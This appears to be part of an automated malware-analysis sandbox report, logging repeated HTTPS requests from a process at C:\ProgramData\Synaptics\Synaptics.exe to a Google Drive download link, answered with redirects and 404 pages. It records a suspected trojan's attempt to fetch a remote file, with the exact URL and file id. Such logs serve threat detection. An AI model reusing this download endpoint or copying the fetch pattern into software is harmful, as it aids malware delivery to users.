                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-srCzE_eNg2l_t1RD-ZG8Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 54 61 72 30 31 38 68 54 4b 55 34 4e 70 4d 76 43 77 37 52 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="HTar018hTKU4NpMvCw7RKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    99192.168.2.949879142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:57 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-klJy-VvPbjvN4YPAH8diAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    100192.168.2.949878142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:57 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DT2IbLqDrujHbFn_7s5QBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    101192.168.2.949880142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    102192.168.2.949882142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    103192.168.2.949884142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-mLbzsuboBmFN_5ysyNq-ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    104192.168.2.949883142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-VkAXNb2EnnrGRaCX2w-wLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    105192.168.2.949885142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:58 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:58 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7moJQJ5z6Iadwrcn9eO-tScHtJwi302NMRpFc3DYyzErylAT0RF0glwHQPtmAvOrVG
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Vxg2Nnzn978BGN6fMtUsZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:58 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:58 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 57 76 65 54 4b 76 6c 6e 6e 56 57 75 4c 51 34 33 34 69 56 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="DWveTKvlnnVWuLQ434iV4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:58 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    106192.168.2.949886142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:58 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6mc2VWXMoauzpyKDVWXyEuRoMX97nSbAhQlcVxyvAWQFXFsRUa3PEX34zL4axQqnurfP0CfdA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-he0L_kENWUKRtxkpNs8jfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 65 31 48 72 44 67 79 5a 69 63 54 35 35 68 31 69 5f 4e 64 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="Ye1HrDgyZicT55h1i_NdLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    107192.168.2.949890142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:58 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
